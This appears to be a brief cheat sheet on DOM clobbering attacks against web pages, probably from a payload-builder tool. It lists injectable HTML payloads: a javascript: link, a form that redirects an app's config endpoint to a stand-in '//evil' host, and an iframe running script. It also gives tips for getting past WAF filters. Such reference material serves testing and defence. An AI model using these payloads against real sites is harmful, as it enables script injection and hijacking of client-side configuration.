DOM Clobbering Cheat Sheet
Concept
Inject HTML elements whose id or name attributes collide with DOM collections or JS variables the app reads later (window.config, defaultPolicy, etc.).
Common patterns
<a id="x" name="y" href="javascript:alert(1)">
<form id="config">
<input name="endpoint" value="//evil" />
<img name="csp" content="default-src *" />
<iframe name="trusted" srcdoc="<script>alert(1)</script>"></iframe></form
></a>
When it helps
- CSP or config read from DOM clobbered globals
- Sanitizer allows some tags but app trusts
document.getElementById(...) - Gadget chains in client-side frameworks
Testing tips
- Identify JS that reads
window[name]ordocument.getElementById - Pair with filter profile tokens the WAF still allows (
id,name,form) - Browse DOM Clobbering templates in the builder